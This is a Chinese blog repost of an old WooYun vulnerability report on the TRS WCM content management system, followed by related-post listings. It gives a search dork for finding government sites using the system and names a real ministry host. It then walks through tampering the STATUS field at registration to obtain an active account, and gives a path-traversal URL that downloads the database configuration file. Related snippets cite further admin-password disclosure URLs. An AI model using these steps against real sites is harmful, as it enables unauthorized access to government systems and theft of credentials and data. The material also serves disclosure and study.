TRS内容管理平台用户注册逻辑漏洞

最新推荐文章于 2024-08-26 17:37:40 发布
转载 最新推荐文章于 2024-08-26 17:37:40 发布 · 7.8k 阅读 · 0
文章标签:

#平台 #firebug #数据库 #2010

本文介绍了一个针对TRS内容管理系统存在的安全漏洞,通过修改注册表单中的STATUS字段可以绕过权限限制,进而利用后台存在的大量注入等漏洞直接操作数据库。

http://www.wooyun.org/bugs/wooyun-2010-08966

首先
site:gov.cn  inurl:WCM
TRS 的内容管理系统是国内政府网站使用最多的系统之一



如上面所说:外交部 http://wcm.fmprc.gov.cn/wcm/

网址加上:wcm/console/auth/reg_newuser.jsp
http://localhost:9999/wcm/console/auth/reg_newuser.jsp
注册,注意使用fireBUG修改表单,注意下图


即将随意表单改成  STATUS 值为 30,或增加STATUS字段表单。
然后提交注册


虽然说是“请等待开通!”,但实际上已经开通了,因为 STATUS 字段让我们改成正常了。
直接登陆


虽然没什么权限,但后台存在大量注入等漏洞
如:



可以通过注入直接操作数据库了。
http://localhost:9999/wcm/file/read_file.jsp?FileName=U020120628383491551127/../../../../../Tomcat/webapps/wcm/WEB-INF/classes/trsconfig/domain/config.xml&sDownName=xx
直接下载数据库配置文件

cnbird2008
关注
2、红帽 RHCSA 9 认证备考指南
s1t2u3的博客
07-23 65
本文详细介绍了红帽 RHCSA 9 认证考试的备考指南,包括作者和技术评审人的背景、学习内容结构、学习方法以及配套资源。通过系统化的学习计划、实践操作和模拟考试训练,帮助考生全面掌握 Linux 系统管理的核心技能,为顺利通过 RHCSA 认证提供支持。
Java开发常见专业术语
weixin_42408447的博客
05-10 1万+
1.脚本 脚本(Script),是使用一种特定的描述性语言,依据一定的格式编写的可执行文件。 2.http协议 HTTP协议,即超文本传输协议(Hyper text transfer protocol)。是一种详细规定了浏览器和万维网(WWW = World Wide Web)服务器之间互相通信的规则,通过因特网传送万维网文档的数据传送协议。 3.B/S结构和C/S结构 B/S(Browser/Server):指浏览器和服务器架构。 C/S(Client/Server):指客户端和服务器架构 4.报文 报文
TRS cms用户注册漏洞
2ed
06-25 3764
据了解TRS WCM涵盖网站建立、内容服务、内容传递等内容价值链的各个方面,将结构化和非结构化信息提供给所有用户。 既然在外网能访问TRS WCM,那就方便许多了,由于是第一次遇到此系统,所以去wooyun上搜了一下相关漏洞利用方式,发现其实wooyun上公布的对这个系统的漏洞利用方式还是很多的,都是些高危漏洞,其中有三个高危漏洞可以很好的利用一下,TRS WCM多为gov站点使用,不过这里遇到了...
TRS的WCM历史漏洞
weixin_42140534的博客
07-30 6844
1访问网站的登录页 看到TRS WCM知道为北京拓尔思开发的一个平台,这个平台是存在相关漏洞的 2 在网址后面添加查看管理员密码的链接 wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin 3在地址栏中输入xxx:8080/wcm/app/login.jsp回车即可成功登录,且账号为system ...
TRS CMS(拓尔思CMS) 漏洞集合
热门推荐
收集盒 Book box
08-09 1万+
TRS(拓尔思)WCM 文件上传漏洞 影响版本: WCM5.2 WCM6.1 漏洞描述: TRSWCM是拓尔思系列产品的重要组成部分,服务于信息资源的发布。 Lee在对WCM6.1(STD1091SP2)进行风险评估的时候发现,file_upload.html未做访问限制,攻击者可以匿名访问上传页面进行文件上传操作。 说明: file/file_upload.html info
(转载)TRS的WCM6漏洞权限绕过以及绕过密码的登陆方式
aocong5568的博客
08-15 1083
转载于:http://www.2cto.com/Article/201302/191261.html 1、由来:建立在 TRS的WCM6可直接获取管理员密码 漏洞的基础上 2、首先访问wcm目录,会自动跳转到登录页面: 3、在网址后加上查看管理员密码的链接: wcm/infoview.do?serviceid=wcm6_user&Meth...
TRSWCM6.5权限管理实战:打造安全用户权限系统的策略
![TRSWCM6.5权限管理实战:打造安全用户权限系统的策略]...文中详细介绍了用户管理、角色与权限分配的策略与实践应用,
TRS WCM 几处突破点
工作ing
12-09 6291
TRS WCM
TRS WCM内容协作平台
07-08
TRS 内容协作平台处于TRS 内容管理基础架构的核心,秉承TRS内容管理CIO标准路线,集协作性、行业性和开放性于一体,是媒体整合、共享和利用数字内容资产,改善组织运行效率,提高核心竞争力的理想选择,可以帮助媒体快速地构建媒体网站、媒体内外信息门户、媒体办公协作平台、媒体的内容采编发平台等,实现全方位的内容管理
wooyun.7z乌云数据库
10-22
wooyun.7z乌云数据库
web cms trs二次开发手册
10-30
1.1 文档的建立  本文档是专门针对WCM产品的二次开发而编写的指导性手册;它从设计原理和应用实践两个方面详细阐述了有关二次开发中所涉及的问题。  本文档是由TRS WCM产品开发组共同建立和维护的。在实际的应用中,WCM开发组有义务不断更新和补充完善本文档。 1.2 文档的组织  本文档在内容组织上,注重设计原理和应用实践两个方面并重。因为我们认为,理解设计原理是更好应用的基础,也是较深层的二次开发所必须了解的内容。  本文档在布局上,按照下面的方式安排:  本文档首先阐述了WCM中最重要的对象模型和体系,它是应用和扩展WCM的最基础、最核心的内容;  然后分别阐述了WCM中最重要的几个应用内容,包括WCM对象体系扩展、系统安全管理、系统配置、任务和计划调度及工作流支持。  最后讨论了WCM应用开发中所涉及的几个应用层面上的问题,这些问题包括并发操作的支持、中文问题及多国语言的支持,以及如何提高WCM二次开发的质量和效率。 1.3 文档的目标 在阅读完本文档后,您应当明确理解和掌握的内容是:  如何应用和扩展WCM对象体系;  如何熟练应用WCM中有关系统配置、任务和计划调度、工作流支持等关键性的扩展性支持开发;  如何熟练解决WCM应用开发中的一些应用层问题,如并发操作支持、中文问题和多国语言支持等。  最终:您应当能够熟练掌握和应用本文档中所有WCM扩展开发内容。
TSCMS内容管理系统最新官方版
04-03
TSCMS内容管理系统最新官方版,TSCMS是遂宁唐氏兄弟网络技术服务有限公司独立研发的一套基于PHP+MySQL平台,采用MVC构架开发的网站建设系统,系统具有速度快,SEO友好,界操作简洁明了,模块扩展方便,二次开发简单等特点。系统支持模块标签数据调用,伪静态配置简单更有利于搜索引擎收录。您只需了解简单的HTML知识便能快速制作出专业的网站。 TSCMS v2.0 bulid20131120 更新日志: 新增安装文档增加演示数据安装选择 新增远程版本提示,增加商业授权判断,增加登陆ip显示 新增安装完后显示浏览后台,默认用户名及密码 新增后台显示登陆IP 修复导航添加模板文件字段错误 修复添加导航时设置新窗口打开无效的情况 移除演示站使用的统计代码 修复模块列表显示admin 修复ip共享主机获取内网ip错误 修复linux下内容模块tree文件引用路径大小写错误,导致tree加载失败 修复linux下部份目录权限设定错误 修得安装时错误提示信息
wooyu漏洞库YYDS!!!入门之道:重现乌云漏洞
最新发布
honest_gg的博客
08-26 2006
wooyun乌云漏洞库手把手搭建教程,最全没有之一!!!
【资源学习】wooyun镜像站
Websec
03-19 7022
wooyun镜像站地址:https://wooyun.kieran.top
wooyun镜像容器逆向分析
qingjie0ng的博客
08-16 1739
docker镜像进行逆向,可分析推出dockerfile文件
发掘安全之奥秘:Wooyun开源项目深度探索
gitblog_00069的博客
06-24 916
发掘安全之奥秘:Wooyun开源项目深度探索 在网络安全日益重要的今天,每一个细小的漏洞都可能成为威胁数据安全的巨大隐患。为此,我们深入挖掘了一款名为**Wooyun(乌云)**的开源宝藏,它不仅仅是一个工具集合,更是安全研究者和web开发者不可或缺的伙伴。让我们一同揭开它的神秘面纱。 1. 项目介绍 Wooyun,对于安全社区来说,这个名字承载着历史与传承。这个开源项目专注于网络安全领域,特别...
推荐开源项目:wooyun_public - 乌云公开漏洞与知识库爬虫和搜索
gitblog_00065的博客
05-11 622
推荐开源项目:wooyun_public - 乌云公开漏洞与知识库爬虫和搜索 1、项目介绍 wooyun_public 是一个由Python编写的爬虫项目,用于抓取并索引乌云平台的公开漏洞和知识库信息。项目提供了友好的界面,让用户能够方便地浏览和搜索这些宝贵的数据,对于安全研究人员、开发人员以及对此领域感兴趣的人来说,这是一个极其实用的工具。 2、项目技术分析 爬虫部分: 使用强大的Scrapy...
本地搭建Wooyun漏洞库(二)——Ubuntu 18.04下搭建WooYun漏洞
浅浅的博客
08-23 3418
本文参考https://github.com/grt1st/wooyun_search 这篇文章是建立在已经搭建好LAMP环境的基础上进行的,搭建方法可见:本地搭建Wooyun漏洞库(一)——Ubuntu 18.04下搭建LAMP环境 一、下载资源 访问https://github.com/grt1st/wooyun_search,下载所需文件。 下载该ZIP文件(文件名为:wooyu...
TRS WCM 6.5用户手册:内容协作与管理平台
1. 统一的内容平台:它集成了各种内容管理功能,提供了一个集中化的操作环境。 2. 无技术门槛,易学易用:设计人性化,使得非技术人员也能轻松上手。 3. 集成企业协作能力:支持多用户协同工作,促进团队间的沟通和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值